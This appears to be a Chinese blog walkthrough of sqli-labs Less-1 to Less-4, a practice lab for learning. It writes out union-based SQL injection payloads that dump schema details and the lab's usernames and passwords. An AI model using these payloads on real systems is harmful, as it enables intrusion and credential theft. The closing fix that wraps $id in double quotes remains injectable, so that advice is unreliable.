说明:部分内容来源于网络,如有侵权联系删除
前情提要:搭建sql-lab本地靶场的时候发现一些致命的报错:
这个程序只能在php 5.x上运行,在php 7及更高版本上,函数"mysql_query"和一些相关函数被删除,而不是"mysqli_query"。某些函数中的"MySQL"被替换为"MySQLi
其中一个原因就是旧版的靶场PHP环境是5.0版本的,而目前小皮面板更新到了8.0版本,配套的PHP环境是7.0。那么解决思路就两种,1:给sql-lab的PHP升级;2:小皮面板改成5.0版本的PHP环境。这里选择第一种解决方案
参考博客:
phpstudy v8.1在php7以上版本安装sqli-labs相关配置过程-CSDN博客
数据库结构简单小结:
mysql数据库5.0以上版本有一个自带的数据库叫做information_schema
该数据库下面有两个表一个是tables和columns
tables这个表的table_name字段下面是所有数据库存在的表名
table_schema字段下是所有表名对应的数据库名
columns这个表的colum_name字段下是所有数据库存在的字段名
columns_schema字段下是所有表名对应的数据库
常见语句记忆:
|----------------------------|----------------|
| information_schema | 表示所有信息,包括库、表、列 |
| information_schema.tables | 记录所有表名信息的表 |
| information_schema.columns | 记录所有列名信息的表 |
| table_schema | 数据库的名称 |
| table_name | 表名 |
| column_name | 列名 |
| group_concat() | 显示所有查询到的数据 |
Less-1 **Error Based- String** 基于字符串的报错注入
根据页面显示,提示我们搭配id传一个值
Please input the ID as parameter with numeric value
输入?id=1 回显
输入?id=2时,页面内容改变
说明这个网站应该会通过id参数进行数据库查询,也就是说id只是一个将1传入数据库的"媒介",数据库真正需要处理的是1。
那么数据库能够处理的究竟是字符串1还是整数1,这是一个有待验证的问题。测试:?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
报错警告我们语法有问题
双引号不报错,那就是单引号的存在使原本SQL语句包裹id=1的单引号没有闭合,破坏了查询语句结构。还知道了一点:错误出现在第1行的末尾,即在"1"LIMIT 0,1'附近。相当于提示我们原有的SQL语句的组成,可以推测一下:
SELECT * FROM users WHERE () LIMIT 0,1;
WHERE子句:WHERE子句用于过滤记录,必须在其后面提供一个条件表达式。例如,WHERE id = 1。
LIMIT子句:LIMIT 1表示只返回结果集中的第一行数据。
使用注释符,测试:?id=1' --+ 。没有发生报错,正是因为注释了后面的LIMIT 0,1;
知道了基本注入方式,就可以通过其他操作符得到我想要的信息了
1,order by查询当前数据表有多少列 ?id=1 ' order by 1,2,3 --+
正常回显没有报错
2,增加猜测列数:?id=1 'order by 1,2,3,4 --+
Unknown column '4' in 'order clause'
发生报错,第4列不存在,但是第3列能正常回显,说明数据表有三列
接下来就需要判断回显点(回显点是指SQL查询结果显示在页面上的位置,有回显点的SQL注入叫做回显点注入。通过回显点,攻击者可以观察到SQL查询的结果,从而推断出数据库的结构和内容),而很明显该靶场存在两个回显点。那么还要分别表格哪一列在页面显示的
?id=-1'union select 1,2,3--+
- ?id=-1:这部分看起来像是试图将一个查询参数设置为 -1,这通常是SQL注入攻击中的一种常见技巧,用于绕过原始查询的条件。
- 'union select 1,2,3--+:这部分是典型的联合查询语法。union 关键字用于合并两个或多个 SELECT 语句的结果集。select 1,2,3 是一个简单的示例查询,它选择常数列 1, 2, 和 3
语句要求回显1,2,3列,结果回显了2,3。说明第二列和第三列的数据是回显点。
通过函数查询数据库名和版本号:
?id=-1'union select 1,database(),version()--+
通过group_concat()函数爆出表名
GROUP_CONCAT() 是 MySQL 中的一个聚合函数,用于将分组中的字符串值连接成一个单一的字符串
GROUP_CONCAT([DISTINCT] expr [ORDER BY {unsigned_integer | col_name | expr} [ASC | DESC] [, ...]] [SEPARATOR str_val])
- DISTINCT:可选参数,用于去除结果中的重复值。
- expr:要连接的列或表达式。
- ORDER BY:可选参数,用于指定连接顺序。
- SEPARATOR:可选参数,用于指定连接字符串之间的分隔符,默认为逗号 ,
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
- group_concat(table_name) 将查询到的 information_schema.tables 表中的 table_name 字段的值进行连接。这里的 information_schema 是MySQL自带的信息数据库,其中的 tables 表存储了数据库的库名以及各个数据库中的表名
- 整个语句将筛选出名为 security 的数据库中的所有表名
结果:emails,referers,uagents,users
爆破字段名:
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
- information_schema.columns 表,这个表存储了数据库中各个表的列信息
爆破结果:CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
可以看到成功爆出来username,password字段
爆破出username,password的数据:
?id=-1' union select 1,group_concat(username),group_concat(password) from users--+
**name:**Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
**Password:**Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
源码:SELECT * FROM users WHERE id='$id' LIMIT 0,1
Less-2 **Error Based- Intiger** 基于整数的报错注入
1,还是搭配id传一个值
由此确定页面正常回显的的标志,再判断整数还是字符串型注入:?id=1'
看到报错,再加双引号测试:?id=1"
仍然报错,说明原本的查询语句没有单双引号闭合,处理参数1数值类型是整数,是整数型注入
2,order by操作符判断数据表有几列:?id=1 order by 1,2,3 --+
?id=1 order by 1,2,3,4 --+
可以判断出该时间表有3列
3,接下来通过union判断回显点,?id=-1 union select 1,2,3 --+
由此得知回显点仅存在于查询的第2,3列上
4,使用操作符和函数爆出数据库名:
?id=-1 union select 1,2,database()--+
数据库名:security,group_concat()函数security所有数据表名:
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
爆出users数据表所有的列名:
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+
最后就可以输出username,password信息了:
?id=-1 union select 1,group_concat(username),group_concat(password) from users--+
YourLogin :name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
源码分析:SELECT * FROM users WHERE id=$id LIMIT 0,1
- 构造了一个SQL查询语句SELECT * FROM users WHERE id=$id LIMIT 0,1;,用于从users表中根据id查询一条记录。
- 使用mysqli_query执行查询,并将结果存储在$result中
查询语句和less1其实差不多,少了单引号对id的闭合包裹
WHERE id=-1: 这是一个条件子句,指定了只有当ID列的值等于-1时,对应的记录才会被选中。原数据表根本没有id=-1的序列,所以后续攻击语句都是?id=-1作为开头
SQL中的ID概念
在SQL(Structured Query Language)中,ID通常指的是数据库表中的一个特殊类型的列,用于唯一标识表中的每一行记录。这种列也被称为主键(Primary Key)。主键的主要目的是确保表中的每一行都可以被唯一地识别和访问。在设计数据库时,选择一个合适的ID字段对于数据的管理和检索至关重要3。
ID的特性
ID字段通常具有以下特性:
- 唯一性:每个ID值必须是唯一的,以确保每行记录都能被准确无误地找到。
- 不可变性:一旦分配给某一行,ID值不应该改变,因为这可能会导致与其他依赖于该ID的数据库操作产生冲突。
- 顺序性:虽然不是必需的,但在某些情况下,ID值可能是按某种顺序(如递增)分配的,这有助于维护数据的时间顺序或逻辑顺序。
ID的常见用途
ID字段在数据库操作中有着广泛的应用,包括但不限于:
- 关联数据:通过ID,可以在不同的表之间建立关系,实现数据的关联查询。例如,一个订单表可能有一个产品ID字段,用于关联到产品表中的具体产品记录。
- 数据检索:可以通过ID快速定位和检索特定的记录。例如,SELECT * FROM users WHERE id = 1 这样的SQL语句可以用来获取ID为1的用户信息。
- 更新和删除:ID也是更新或删除特定记录时的关键依据。例如,DELETE FROM users WHERE id = 1 可以用来删除ID为1的用户记录。
自动增长ID
在许多现代数据库系统中,支持为ID字段设置自动增长属性。这意味着每当新记录插入到表中时,数据库会自动为该记录分配一个新的、唯一的ID值。这通常通过数据库内部的计数器机制实现。例如,在MySQL中,可以使用AUTO_INCREMENT关键字来定义自动增长的ID字段6。
Less-3 Error Based- String (with Twist)基于字符串的报错注入(转义)
1,第一步还是判断什么类型的注入:?id=1
能够正常回显,再测试:?id=1' 产生报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
再测试:?id=1" 能够正常回显。说明单引号会破坏查询语句原有单引号的闭合结构,可以断定这是一个字符型注入
2,order by判断当前数据表的列数:?id=1') order by 1,2,3--+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3-- ') LIMIT 0,1' at line 1
还是发生了报错,通过报错信息我们知道了真正的闭合方式是')。修改payload:
?id=1') order by 1,2,3--+ 正常回显
依次递归判断:?id=1') order by 1,2,3,4--+
报错说不存在第4列,那么数据表就只有3列
3,union操作符判断注入点:?id=-1') union select 1,2,3--+
回显还是2,3列
4,爆破数据库名:?id=-1') union select 1,2,database()--+
Your Password:security
配合group_concat()函数爆破出当前数据库所有数据表名:
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()--+
查看users数据表里面的所有列名:
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+
最后再爆出用户名和密码:
?id=-1') union select 1,group_concat(username),group_concat(password) from users--+
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
源码分析:SELECT * FROM users WHERE id=('$id') LIMIT 0,1
其实和less1的查询语句是一样的,只不过多了括号闭合
Less-4 Error Based- DoubleQuotes String
基于双引号的报错注入
1,id传一个值判断注入类型:?id=1'
正常回显页面,再拼接双引号传入一个值:?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
发生报错,说明双引号会破坏原有查询语句的结构,由此判断注入类型是双引号,而参数又需要使用引号包裹,所以是字符串类型。还有一点,根据报错提示,推断正确的闭合方式应该是:("")
2,order by判断有该数据表有多少列,先猜测三列
?id=1") order by 1,2,3--+
回显是正常的,证明至少有三列,再判断是否有四列:?id=1") order by 1,2,3,4--+
发生报错,推断数据表只有3列
3,union判断回显点:?id=-1") union select 1,2,3--+
只会回显点是2,3列
4,爆破数据库名:?id=-1") union select 1,2,database()--+
爆破出数据表名:?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
爆破users表所有列名:?id=1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and
table_schema=database()--+
再爆破出所有的用户名和密码:?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
select * from user where id=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+
select * from user where id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+
输出结果的区别
**查询目的:**这两个SQL查询的目的是利用SQL注入技术来获取数据库中users表的列名信息。
**查询结构:**两个查询都使用了UNION操作符来合并两个SELECT语句的结果集。第一个查询的条件是id=1,而第二个查询的条件是id=-1。
输出结果的区别
- 第一个查询 (id=1):
- 如果user表中存在id=1的记录,那么查询会首先返回该记录。
- 然后,UNION操作符会将第二个SELECT语句的结果(即从information_schema.columns 表中获取的列名信息)追加到结果集中。
- 最终输出结果将包含user表中id=1的记录以及users表的列名信息。
- 第二个查询 (id=-1):
- 由于user表中通常不会有id=-1的记录,第一个SELECT语句将不会返回任何记录。
- 因此,UNION操作符的结果将仅包含第二个SELECT语句的结果,即users表的列名信息。
- 最终输出结果将只包含users表的列名信息。
分析源码:
id****=****'"'****.****id**.'"';**
这行代码的作用是将 id 变量的值用双引号包裹起来。例如,如果 id 的值是 123,那么执行这行代码后,$id 的值将变为 "123"
" SELECT * FROM users WHERE id=( $id ) LIMIT 0 , 1 ";
本质上less1,2,3,4的查询语句是一样的,无非是对传入参数的闭合拼接方式不同
改进建议:
- 使用预处理语句: 为了防止SQL注入,建议使用预处理语句(Prepared Statements)。例如:
stmt = pdo->prepare('SELECT * FROM users WHERE id = ? LIMIT 0,1');
stmt-\>execute(\[id]); - 简化字符串操作: 如果确实需要将 id 用双引号包裹起来,可以考虑在SQL查询中直接使用双引号,而不是在PHP代码中进行字符串拼接。例如: sql = "SELECT * FROM users WHERE id=\"$id\" LIMIT 0,1";